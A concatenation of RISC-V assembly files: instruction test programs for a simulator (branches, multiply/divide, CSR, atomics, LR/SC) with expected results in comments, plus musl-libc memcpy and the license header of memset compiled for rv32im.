sb x2, 249(x31) # Should take
bge1:
bge x2, x1, bge2
sb x2, 250(x31) # Should skip
bge2:
bge x1, x4, bge3
sb x2, 251(x31) # Should skip
bge3: # Should be 0x0000e315
# BLTU
li x3, 0x16
sw x3, 252(x31)
bltu x1, x2, bltu1
sb x1, 253(x31) # Should take
bltu1:
bltu x2, x1, bltu2
sb x1, 254(x31) # Should skip
bltu2:
bltu x1, x4, bltu3
sb x1, 255(x31) # Should take
bltu3: # Should be 0x32003216
# BGEU
li x3, 0x17
sw x3, 256(x31)
bgeu x1, x2, bgeu1
sb x2, 257(x31) # Should skip
bgeu1:
bgeu x2, x1, bgeu2
sb x2, 258(x31) # Should take
bgeu2:
bgeu x1, x4, bgeu3
sb x2, 259(x31) # Should skip
bgeu3: # Should be 0x00e30017
# ---------------- FENCE ------------------
fence
sw x1, 260(x31) # Should be 0xbcfec832
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 3,170 | asm/src/mul_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# ----------------- MUL -------------------
# MUL x1 * x2
mul x3, x1, x2 # Should be 0x694fdc56
sw x3, 0(x31)
mulh x3, x1, x2 # Should be 0xeac1dec6
sw x3, 4(x31)
mulhu x3, x1, x2 # Should be 0x3beaeba9
sw x3, 8(x31)
mulhsu x3, x1, x2 # Should be 0xeac1dec6
sw x3, 12(x31)
mulhsu x3, x2, x1 # Should be 0x3beaeba9
sw x3, 16(x31)
# MUL x1 * x1
mul x3, x1, x1 # Should be 0x4fc629c4
sw x3, 20(x31)
mulh x3, x1, x1 # Should be 0x1189a337
sw x3, 24(x31)
mulhu x3, x1, x1 # Should be 0x8b87339b
sw x3, 28(x31)
mulhsu x3, x1, x1 # Should be 0xce886b69
sw x3, 32(x31)
# MUL x2 * x2
mul x3, x2, x2 # Should be 0xc75c1149
sw x3, 36(x31)
mulh x3, x2, x2 # Should be 0x19bb00bc
sw x3, 40(x31)
mulhu x3, x2, x2 # Should be 0x19bb00bc
sw x3, 44(x31)
mulhsu x3, x2, x2 # Should be 0x19bb00bc
sw x3, 48(x31)
# --------------- DIV REM -----------------
li x2, 0xff290ce3
# DIV
div x3, x1, x2 # Should be 0x0000004f
sw x3, 52(x31)
div x3, x2, x1 # Should be 0x00000000
sw x3, 56(x31)
# DIVU
divu x3, x1, x2 # Should be 0x00000000
sw x3, 60(x31)
divu x3, x2, x1 # Should be 0x00000001
sw x3, 64(x31)
# REM
rem x3, x1, x2 # Should be 0xff53ce25
sw x3, 68(x31)
rem x3, x2, x1 # Should be 0xff290ce3
sw x3, 72(x31)
# REMU
remu x3, x1, x2 # Should be 0xbcfec832
sw x3, 76(x31)
remu x3, x2, x1 # Should be 0x422a44b1
sw x3, 80(x31)
# -------------- DIV ZERO -----------------
li x2, 0x51290ce3
# DIV
div x3, x1, x0 # Should be 0xffffffff
sw x3, 84(x31)
div x3, x2, x0 # Should be 0xffffffff
sw x3, 88(x31)
# DIVU
divu x3, x1, x0 # Should be 0xffffffff
sw x3, 92(x31)
divu x3, x2, x0 # Should be 0xffffffff
sw x3, 96(x31)
# REM
rem x3, x1, x0 # Should be 0xbcfec832
sw x3, 100(x31)
rem x3, x2, x0 # Should be 0x51290ce3
sw x3, 104(x31)
# REMU
remu x3, x1, x0 # Should be 0xbcfec832
sw x3, 108(x31)
remu x3, x2, x0 # Should be 0x51290ce3
sw x3, 112(x31)
# ------------ DIV OVERFLOW ---------------
li x1, 0x80000000
li x2, 0xffffffff
# DIV
div x3, x1, x2 # Should be 0x80000000
sw x3, 116(x31)
# DIVU
divu x3, x1, x2 # Should be 0x00000000
sw x3, 120(x31)
# REM
rem x3, x1, x2 # Should be 0x00000000
sw x3, 124(x31)
# REMU
remu x3, x1, x2 # Should be 0x80000000
sw x3, 128(x31)
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 1,044 | asm/src/csr_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load some random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
li x4, 0x0e27d515
# ----------------- MUL -------------------
# CSRRW
csrw mscratch, x4
csrrw x3, mscratch, x1 # Should be 0x0e27d515
sw x3, 0(x31)
# CSRRS
csrrs x3, mscratch, x2 # Should be 0xbcfec832
sw x3, 4(x31)
# CSRRC
csrrc x3, mscratch, x1 # Should be 0xfdffccf3
sw x3, 8(x31)
# CSRRWI
csrrwi x3, mscratch, 0x13 # Should be 0x410104c1
sw x3, 12(x31)
csrrw x3, mscratch, x2 # Should be 0x00000013
sw x3, 16(x31)
# CSRRSI
csrrsi x3, mscratch, 0x07 # Should be 0x51290ce3
sw x3, 20(x31)
# CSRRCI
csrrci x3, mscratch, 0x1d # Should be 0x51290ce7
sw x3, 24(x31)
csrr x3, mscratch # Should be 0x51290ce2
sw x3, 28(x31)
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 3,416 | asm/src/amo_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# ----------------- AMO -------------------
# AMOSWAP
sw x1, (x31)
amoswap.w x3, x2, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 8
sw x2, (x31)
amoswap.w x3, x1, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 16
# AMOADD
sw x1, (x31)
amoadd.w x3, x2, (x31) # Should be 0x0e27d515
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 24
sw x2, (x31)
amoadd.w x3, x1, (x31) # Should be 0x0e27d515
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 32
# AMOXOR
sw x1, (x31)
amoxor.w x3, x2, (x31) # Should be 0xedd7c4d1
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 40
sw x2, (x31)
amoxor.w x3, x1, (x31) # Should be 0xedd7c4d1
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 48
# AMOOR
sw x1, (x31)
amoor.w x3, x2, (x31) # Should be 0xfdffccf3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 56
sw x2, (x31)
amoor.w x3, x1, (x31) # Should be 0xfdffccf3
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 64
# AMOAND
sw x1, (x31)
amoand.w x3, x2, (x31) # Should be 0x10280822
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 72
sw x2, (x31)
amoand.w x3, x1, (x31) # Should be 0x10280822
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 80
# AMOMIN
sw x1, (x31)
amomin.w x3, x2, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 88
sw x2, (x31)
amomin.w x3, x1, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 96
# AMOMAX
sw x1, (x31)
amomax.w x3, x2, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 104
sw x2, (x31)
amomax.w x3, x1, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 112
# AMOMINU
sw x1, (x31)
amominu.w x3, x2, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 120
sw x2, (x31)
amominu.w x3, x1, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 128
# AMOMAXU
sw x1, (x31)
amomaxu.w x3, x2, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 136
sw x2, (x31)
amomaxu.w x3, x1, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 144
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 3,361 | asm/src/lrsc_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Addr to test lr/sc
li x30, 0x00000ffc # Main addr
li x29, 0x00000ff8 # Other addr
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# --------------- LR -> SC ----------------
# Same addr
sw x1, (x30)
lr.w x3, (x30)
sw x3, 0(x31) # Should be 0xbcfec832
sc.w x4, x2, (x30) # Should succeed
sw x4, 4(x31) # Should be 0x00000000
# Other addr
lr.w x3, (x30)
sw x3, 8(x31) # Should be 0x51290ce3
sc.w x4, x2, (x29) # Should fail
sw x4, 12(x31) # Should be 0x00000001
# ------------ LR -> SC -> SC -------------
# Same addr
lr.w x3, (x30)
sw x3, 16(x31) # Should be 0x51290ce3
sc.w x4, x1, (x30) # Should succeed
sc.w x5, x2, (x30) # Should fail
sw x4, 20(x31) # Should be 0x00000000
sw x5, 24(x31) # Should be 0x00000001
# Other addr
lr.w x3, (x30)
sw x3, 28(x31) # Should be 0xbcfec832
sc.w x4, x2, (x29) # Should fail
sc.w x5, x2, (x30) # Should fail
sw x4, 32(x31) # Should be 0x00000001
sw x5, 36(x31) # Should be 0x00000001
# ------------ LR -> SW -> SC -------------
# Same addr
lr.w x3, (x30)
sw x3, 40(x31) # Should be 0xbcfec832
sw x2, (x30) # Should invalidate
sc.w x4, x1, (x30) # Should fail
sw x4, 44(x31) # Should be 0x00000001
# Other addr
lr.w x3, (x30)
sw x3, 48(x31) # Should be 0x51290ce3
sw x1, (x29) # Should not invalidate
sc.w x4, x1, (x30) # Should succeed
sw x4, 52(x31) # Should be 0x00000000
# ------------ LR -> SH -> SC -------------
# Same addr + 2
addi x28, x30, 2
lr.w x3, (x30)
sw x3, 56(x31) # Should be 0xbcfec832
sh x2, (x28) # Should invalidate
sc.w x4, x1, (x30) # Should fail
sw x4, 60(x31) # Should be 0x00000001
# Other addr + 2
addi x27, x29, 2
lr.w x3, (x30)
sw x3, 64(x31) # Should be 0x0ce3c832
sh x1, (x27) # Should not invalidate
sc.w x4, x1, (x30) # Should succeed
sw x4, 68(x31) # Should be 0x00000000
# ------------ LR -> SB -> SC -------------
# Same addr + 3
addi x28, x30, 3
lr.w x3, (x30)
sw x3, 72(x31) # Should be 0xbcfec832
sb x2, (x28) # Should invalidate
sc.w x4, x1, (x30) # Should fail
sw x4, 76(x31) # Should be 0x00000001
# Other addr + 3
addi x27, x29, 3
lr.w x3, (x30)
sw x3, 80(x31) # Should be 0xe3fec832
sb x1, (x27) # Should not invalidate
sc.w x4, x1, (x30) # Should succeed
sw x4, 84(x31) # Should be 0x00000000
# ------------ LR -> LR -> SC -------------
# Other addr
lr.w x3, (x30)
sw x3, 88(x31) # Should be 0xbcfec832
lr.w x3, (x29)
sc.w x4, x2, (x30) # Should fail
sw x4, 92(x31) # Should be 0x00000001
lw x3, (x30)
sw x3, 96(x31) # Should be 0xbcfec832
# ---------------- ECALL ------------------
ecall
|
mintair-xyz/succinct-sp1 | 11,855 | crates/zkvm/entrypoint/src/memcpy.s | // This is musl-libc commit 37e18b7bf307fa4a8c745feebfcba54a0ba74f30:
//
// src/string/memcpy.c
//
// This was compiled into assembly with:
//
// clang-14 -target riscv32 -march=rv32im -O3 -S memcpy.c -nostdlib -fno-builtin -funroll-loops
//
// and labels manually updated to not conflict.
//
// musl as a whole is licensed under the following standard MIT license:
//
// ----------------------------------------------------------------------
// Copyright © 2005-2020 Rich Felker, et al.
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
// IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
// CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
// TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
// SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
// ----------------------------------------------------------------------
//
// Authors/contributors include:
//
// A. Wilcox
// Ada Worcester
// Alex Dowad
// Alex Suykov
// Alexander Monakov
// Andre McCurdy
// Andrew Kelley
// Anthony G. Basile
// Aric Belsito
// Arvid Picciani
// Bartosz Brachaczek
// Benjamin Peterson
// Bobby Bingham
// Boris Brezillon
// Brent Cook
// Chris Spiegel
// Clément Vasseur
// Daniel Micay
// Daniel Sabogal
// Daurnimator
// David Carlier
// David Edelsohn
// Denys Vlasenko
// Dmitry Ivanov
// Dmitry V. Levin
// Drew DeVault
// Emil Renner Berthing
// Fangrui Song
// Felix Fietkau
// Felix Janda
// Gianluca Anzolin
// Hauke Mehrtens
// He X
// Hiltjo Posthuma
// Isaac Dunham
// Jaydeep Patil
// Jens Gustedt
// Jeremy Huntwork
// Jo-Philipp Wich
// Joakim Sindholt
// John Spencer
// Julien Ramseier
// Justin Cormack
// Kaarle Ritvanen
// Khem Raj
// Kylie McClain
// Leah Neukirchen
// Luca Barbato
// Luka Perkov
// M Farkas-Dyck (Strake)
// Mahesh Bodapati
// Markus Wichmann
// Masanori Ogino
// Michael Clark
// Michael Forney
// Mikhail Kremnyov
// Natanael Copa
// Nicholas J. Kain
// orc
// Pascal Cuoq
// Patrick Oppenlander
// Petr Hosek
// Petr Skocik
// Pierre Carrier
// Reini Urban
// Rich Felker
// Richard Pennington
// Ryan Fairfax
// Samuel Holland
// Segev Finer
// Shiz
// sin
// Solar Designer
// Stefan Kristiansson
// Stefan O'Rear
// Szabolcs Nagy
// Timo Teräs
// Trutz Behn
// Valentin Ochs
// Will Dietz
// William Haddon
// William Pitcock
//
// Portions of this software are derived from third-party works licensed
// under terms compatible with the above MIT license:
//
// The TRE regular expression implementation (src/regex/reg* and
// src/regex/tre*) is Copyright © 2001-2008 Ville Laurikari and licensed
// under a 2-clause BSD license (license text in the source files). The
// included version has been heavily modified by Rich Felker in 2012, in
// the interests of size, simplicity, and namespace cleanliness.
//
// Much of the math library code (src/math/* and src/complex/*) is
// Copyright © 1993,2004 Sun Microsystems or
// Copyright © 2003-2011 David Schultz or
// Copyright © 2003-2009 Steven G. Kargl or
// Copyright © 2003-2009 Bruce D. Evans or
// Copyright © 2008 Stephen L. Moshier or
// Copyright © 2017-2018 Arm Limited
// and labelled as such in comments in the individual source files. All
// have been licensed under extremely permissive terms.
//
// The ARM memcpy code (src/string/arm/memcpy.S) is Copyright © 2008
// The Android Open Source Project and is licensed under a two-clause BSD
// license. It was taken from Bionic libc, used on Android.
//
// The AArch64 memcpy and memset code (src/string/aarch64/*) are
// Copyright © 1999-2019, Arm Limited.
//
// The implementation of DES for crypt (src/crypt/crypt_des.c) is
// Copyright © 1994 David Burren. It is licensed under a BSD license.
//
// The implementation of blowfish crypt (src/crypt/crypt_blowfish.c) was
// originally written by Solar Designer and placed into the public
// domain. The code also comes with a fallback permissive license for use
// in jurisdictions that may not recognize the public domain.
//
// The smoothsort implementation (src/stdlib/qsort.c) is Copyright © 2011
// Valentin Ochs and is licensed under an MIT-style license.
//
// The x86_64 port was written by Nicholas J. Kain and is licensed under
// the standard MIT terms.
//
// The mips and microblaze ports were originally written by Richard
// Pennington for use in the ellcc project. The original code was adapted
// by Rich Felker for build system and code conventions during upstream
// integration. It is licensed under the standard MIT terms.
//
// The mips64 port was contributed by Imagination Technologies and is
// licensed under the standard MIT terms.
//
// The powerpc port was also originally written by Richard Pennington,
// and later supplemented and integrated by John Spencer. It is licensed
// under the standard MIT terms.
//
// All other files which have no copyright comments are original works
// produced specifically for use as part of this library, written either
// by Rich Felker, the main author of the library, or by one or more
// contributors listed above. Details on authorship of individual files
// can be found in the git version control history of the project. The
// omission of copyright and license comments in each file is in the
// interest of source tree size.
//
// In addition, permission is hereby granted for all public header files
// (include/* and arch/* /bits/* ) and crt files intended to be linked into
// applications (crt/*, ldso/dlstart.c, and arch/* /crt_arch.h) to omit
// the copyright notice and permission notice otherwise required by the
// license, and to use these files without any requirement of
// attribution. These files include substantial contributions from:
//
// Bobby Bingham
// John Spencer
// Nicholas J. Kain
// Rich Felker
// Richard Pennington
// Stefan Kristiansson
// Szabolcs Nagy
//
// all of whom have explicitly granted such permission.
//
// This file previously contained text expressing a belief that most of
// the files covered by the above exception were sufficiently trivial not
// to be subject to copyright, resulting in confusion over whether it
// negated the permissions granted in the license. In the spirit of
// permissive licensing, and of not having licensing issues being an
// obstacle to adoption, that text has been removed.
.text
.attribute 4, 16
.attribute 5, "rv32im"
.file "musl_memcpy.c"
.globl memcpy
.p2align 2
.type memcpy,@function
memcpy:
andi a3, a1, 3
seqz a3, a3
seqz a4, a2
or a3, a3, a4
bnez a3, .LBBmemcpy0_11
addi a5, a1, 1
mv a6, a0
.LBBmemcpy0_2:
lb a7, 0(a1)
addi a4, a1, 1
addi a3, a6, 1
sb a7, 0(a6)
addi a2, a2, -1
andi a1, a5, 3
snez a1, a1
snez a6, a2
and a7, a1, a6
addi a5, a5, 1
mv a1, a4
mv a6, a3
bnez a7, .LBBmemcpy0_2
andi a1, a3, 3
beqz a1, .LBBmemcpy0_12
.LBBmemcpy0_4:
li a5, 32
bltu a2, a5, .LBBmemcpy0_26
li a5, 3
beq a1, a5, .LBBmemcpy0_19
li a5, 2
beq a1, a5, .LBBmemcpy0_22
li a5, 1
bne a1, a5, .LBBmemcpy0_26
lw a5, 0(a4)
sb a5, 0(a3)
srli a1, a5, 8
sb a1, 1(a3)
srli a6, a5, 16
addi a1, a3, 3
sb a6, 2(a3)
addi a2, a2, -3
addi a3, a4, 16
li a4, 16
.LBBmemcpy0_9:
lw a6, -12(a3)
srli a5, a5, 24
slli a7, a6, 8
lw t0, -8(a3)
or a5, a7, a5
sw a5, 0(a1)
srli a5, a6, 24
slli a6, t0, 8
lw a7, -4(a3)
or a5, a6, a5
sw a5, 4(a1)
srli a6, t0, 24
slli t0, a7, 8
lw a5, 0(a3)
or a6, t0, a6
sw a6, 8(a1)
srli a6, a7, 24
slli a7, a5, 8
or a6, a7, a6
sw a6, 12(a1)
addi a1, a1, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a4, a2, .LBBmemcpy0_9
addi a4, a3, -13
j .LBBmemcpy0_25
.LBBmemcpy0_11:
mv a3, a0
mv a4, a1
andi a1, a3, 3
bnez a1, .LBBmemcpy0_4
.LBBmemcpy0_12:
li a1, 16
bltu a2, a1, .LBBmemcpy0_15
li a1, 15
.LBBmemcpy0_14:
lw a5, 0(a4)
lw a6, 4(a4)
lw a7, 8(a4)
lw t0, 12(a4)
sw a5, 0(a3)
sw a6, 4(a3)
sw a7, 8(a3)
sw t0, 12(a3)
addi a4, a4, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a1, a2, .LBBmemcpy0_14
.LBBmemcpy0_15:
andi a1, a2, 8
beqz a1, .LBBmemcpy0_17
lw a1, 0(a4)
lw a5, 4(a4)
sw a1, 0(a3)
sw a5, 4(a3)
addi a3, a3, 8
addi a4, a4, 8
.LBBmemcpy0_17:
andi a1, a2, 4
beqz a1, .LBBmemcpy0_30
lw a1, 0(a4)
sw a1, 0(a3)
addi a3, a3, 4
addi a4, a4, 4
j .LBBmemcpy0_30
.LBBmemcpy0_19:
lw a5, 0(a4)
addi a1, a3, 1
sb a5, 0(a3)
addi a2, a2, -1
addi a3, a4, 16
li a4, 18
.LBBmemcpy0_20:
lw a6, -12(a3)
srli a5, a5, 8
slli a7, a6, 24
lw t0, -8(a3)
or a5, a7, a5
sw a5, 0(a1)
srli a5, a6, 8
slli a6, t0, 24
lw a7, -4(a3)
or a5, a6, a5
sw a5, 4(a1)
srli a6, t0, 8
slli t0, a7, 24
lw a5, 0(a3)
or a6, t0, a6
sw a6, 8(a1)
srli a6, a7, 8
slli a7, a5, 24
or a6, a7, a6
sw a6, 12(a1)
addi a1, a1, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a4, a2, .LBBmemcpy0_20
addi a4, a3, -15
j .LBBmemcpy0_25
.LBBmemcpy0_22:
lw a5, 0(a4)
sb a5, 0(a3)
srli a6, a5, 8
addi a1, a3, 2
sb a6, 1(a3)
addi a2, a2, -2
addi a3, a4, 16
li a4, 17
.LBBmemcpy0_23:
lw a6, -12(a3)
srli a5, a5, 16
slli a7, a6, 16
lw t0, -8(a3)
or a5, a7, a5
sw a5, 0(a1)
srli a5, a6, 16
slli a6, t0, 16
lw a7, -4(a3)
or a5, a6, a5
sw a5, 4(a1)
srli a6, t0, 16
slli t0, a7, 16
lw a5, 0(a3)
or a6, t0, a6
sw a6, 8(a1)
srli a6, a7, 16
slli a7, a5, 16
or a6, a7, a6
sw a6, 12(a1)
addi a1, a1, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a4, a2, .LBBmemcpy0_23
addi a4, a3, -14
.LBBmemcpy0_25:
mv a3, a1
.LBBmemcpy0_26:
andi a1, a2, 16
bnez a1, .LBBmemcpy0_35
andi a1, a2, 8
bnez a1, .LBBmemcpy0_36
.LBBmemcpy0_28:
andi a1, a2, 4
beqz a1, .LBBmemcpy0_30
.LBBmemcpy0_29:
lb a1, 0(a4)
lb a5, 1(a4)
lb a6, 2(a4)
sb a1, 0(a3)
sb a5, 1(a3)
lb a1, 3(a4)
sb a6, 2(a3)
addi a4, a4, 4
addi a5, a3, 4
sb a1, 3(a3)
mv a3, a5
.LBBmemcpy0_30:
andi a1, a2, 2
bnez a1, .LBBmemcpy0_33
andi a1, a2, 1
bnez a1, .LBBmemcpy0_34
.LBBmemcpy0_32:
ret
.LBBmemcpy0_33:
lb a1, 0(a4)
lb a5, 1(a4)
sb a1, 0(a3)
addi a4, a4, 2
addi a1, a3, 2
sb a5, 1(a3)
mv a3, a1
andi a1, a2, 1
beqz a1, .LBBmemcpy0_32
.LBBmemcpy0_34:
lb a1, 0(a4)
sb a1, 0(a3)
ret
.LBBmemcpy0_35:
lb a1, 0(a4)
lb a5, 1(a4)
lb a6, 2(a4)
sb a1, 0(a3)
sb a5, 1(a3)
lb a1, 3(a4)
sb a6, 2(a3)
lb a5, 4(a4)
lb a6, 5(a4)
sb a1, 3(a3)
lb a1, 6(a4)
sb a5, 4(a3)
sb a6, 5(a3)
lb a5, 7(a4)
sb a1, 6(a3)
lb a1, 8(a4)
lb a6, 9(a4)
sb a5, 7(a3)
lb a5, 10(a4)
sb a1, 8(a3)
sb a6, 9(a3)
lb a1, 11(a4)
sb a5, 10(a3)
lb a5, 12(a4)
lb a6, 13(a4)
sb a1, 11(a3)
lb a1, 14(a4)
sb a5, 12(a3)
sb a6, 13(a3)
lb a5, 15(a4)
sb a1, 14(a3)
addi a4, a4, 16
addi a1, a3, 16
sb a5, 15(a3)
mv a3, a1
andi a1, a2, 8
beqz a1, .LBBmemcpy0_28
.LBBmemcpy0_36:
lb a1, 0(a4)
lb a5, 1(a4)
lb a6, 2(a4)
sb a1, 0(a3)
sb a5, 1(a3)
lb a1, 3(a4)
sb a6, 2(a3)
lb a5, 4(a4)
lb a6, 5(a4)
sb a1, 3(a3)
lb a1, 6(a4)
sb a5, 4(a3)
sb a6, 5(a3)
lb a5, 7(a4)
sb a1, 6(a3)
addi a4, a4, 8
addi a1, a3, 8
sb a5, 7(a3)
mv a3, a1
andi a1, a2, 4
bnez a1, .LBBmemcpy0_29
j .LBBmemcpy0_30
.Lfuncmemcpy_end0:
.size memcpy, .Lfuncmemcpy_end0-memcpy
.ident "Ubuntu clang version 14.0.6-++20220622053131+f28c006a5895-1~exp1~20220622173215.157"
.section ".note.GNU-stack","",@progbits
.addrsig |
mintair-xyz/succinct-sp1 | 8,450 | crates/zkvm/entrypoint/src/memset.s | // This is musl-libc memset commit 37e18b7bf307fa4a8c745feebfcba54a0ba74f30:
//
// src/string/memset.c
//
// This was compiled into assembly with:
//
// clang-14 -target riscv32 -march=rv32im -O3 -S memset.c -nostdlib -fno-builtin -funroll-loops
//
// and labels manually updated to not conflict.
//
// musl as a whole is licensed under the following standard MIT license:
//
// ----------------------------------------------------------------------
// Copyright © 2005-2020 Rich Felker, et al.
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
// IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
// CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
// TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
// SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
// ----------------------------------------------------------------------
//
// Authors/contributors include:
//
// A. Wilcox
// Ada Worcester
// Alex Dowad
// Alex Suykov
// Alexander Monakov
// Andre McCurdy
// Andrew Kelley
// Anthony G. Basile
// Aric Belsito
// Arvid Picciani
// Bartosz Brachaczek
// Benjamin Peterson
// Bobby Bingham
// Boris Brezillon
// Brent Cook
// Chris Spiegel
// Clément Vasseur
// Daniel Micay
// Daniel Sabogal
// Daurnimator
// David Carlier
// David Edelsohn
// Denys Vlasenko
// Dmitry Ivanov
// Dmitry V. Levin
// Drew DeVault
// Emil Renner Berthing
// Fangrui Song
// Felix Fietkau
// Felix Janda
// Gianluca Anzolin
// Hauke Mehrtens
// He X
// Hiltjo Posthuma
// Isaac Dunham
// Jaydeep Patil
// Jens Gustedt
// Jeremy Huntwork
// Jo-Philipp Wich
// Joakim Sindholt
// John Spencer
// Julien Ramseier
// Justin Cormack
// Kaarle Ritvanen
// Khem Raj
// Kylie McClain
// Leah Neukirchen
// Luca Barbato
// Luka Perkov
// M Farkas-Dyck (Strake)
// Mahesh Bodapati
// Markus Wichmann
// Masanori Ogino
// Michael Clark
// Michael Forney
// Mikhail Kremnyov
// Natanael Copa
// Nicholas J. Kain
// orc
// Pascal Cuoq
// Patrick Oppenlander
// Petr Hosek
// Petr Skocik
// Pierre Carrier
// Reini Urban
// Rich Felker
// Richard Pennington
// Ryan Fairfax
// Samuel Holland
// Segev Finer
// Shiz
// sin
// Solar Designer
// Stefan Kristiansson
// Stefan O'Rear
// Szabolcs Nagy
// Timo Teräs
// Trutz Behn
// Valentin Ochs
// Will Dietz
// William Haddon
// William Pitcock
//
// Portions of this software are derived from third-party works licensed
// under terms compatible with the above MIT license:
//
// The TRE regular expression implementation (src/regex/reg* and
// src/regex/tre*) is Copyright © 2001-2008 Ville Laurikari and licensed
// under a 2-clause BSD license (license text in the source files). The
// included version has been heavily modified by Rich Felker in 2012, in
// the interests of size, simplicity, and namespace cleanliness.
//
// Much of the math library code (src/math/* and src/complex/*) is
// Copyright © 1993,2004 Sun Microsystems or
// Copyright © 2003-2011 David Schultz or
// Copyright © 2003-2009 Steven G. Kargl or
// Copyright © 2003-2009 Bruce D. Evans or
// Copyright © 2008 Stephen L. Moshier or
// Copyright © 2017-2018 Arm Limited
// and labelled as such in comments in the individual source files. All
// have been licensed under extremely permissive terms.
//
// The ARM memcpy code (src/string/arm/memcpy.S) is Copyright © 2008
// The Android Open Source Project and is licensed under a two-clause BSD
// license. It was taken from Bionic libc, used on Android.
//
// The AArch64 memcpy and memset code (src/string/aarch64/*) are
// Copyright © 1999-2019, Arm Limited.
//
// The implementation of DES for crypt (src/crypt/crypt_des.c) is
// Copyright © 1994 David Burren. It is licensed under a BSD license.
//
// The implementation of blowfish crypt (src/crypt/crypt_blowfish.c) was
// originally written by Solar Designer and placed into the public
// domain. The code also comes with a fallback permissive license for use
// in jurisdictions that may not recognize the public domain.
//
// The smoothsort implementation (src/stdlib/qsort.c) is Copyright © 2011
// Valentin Ochs and is licensed under an MIT-style license.
//
// The x86_64 port was written by Nicholas J. Kain and is licensed under
// the standard MIT terms.
//
// The mips and microblaze ports were originally written by Richard
// Pennington for use in the ellcc project. The original code was adapted
// by Rich Felker for build system and code conventions during upstream
// integration. It is licensed under the standard MIT terms.
//
// The mips64 port was contributed by Imagination Technologies and is
// licensed under the standard MIT terms.
//
// The powerpc port was also originally written by Richard Pennington,
// and later supplemented and integrated by John Spencer. It is licensed
// under the standard MIT terms.
//
// All other files which have no copyright comments are original works
// produced specifically for use as part of this library, written either
// by Rich Felker, the main author of the library, or by one or more
// contributors listed above. Details on authorship of individual files
// can be found in the git version control history of the project. The
// omission of copyright and license comments in each file is in the
// interest of source tree size.
//
// In addition, permission is hereby granted for all public header files
// (include/* and arch/* /bits/* ) and crt files intended to be linked into
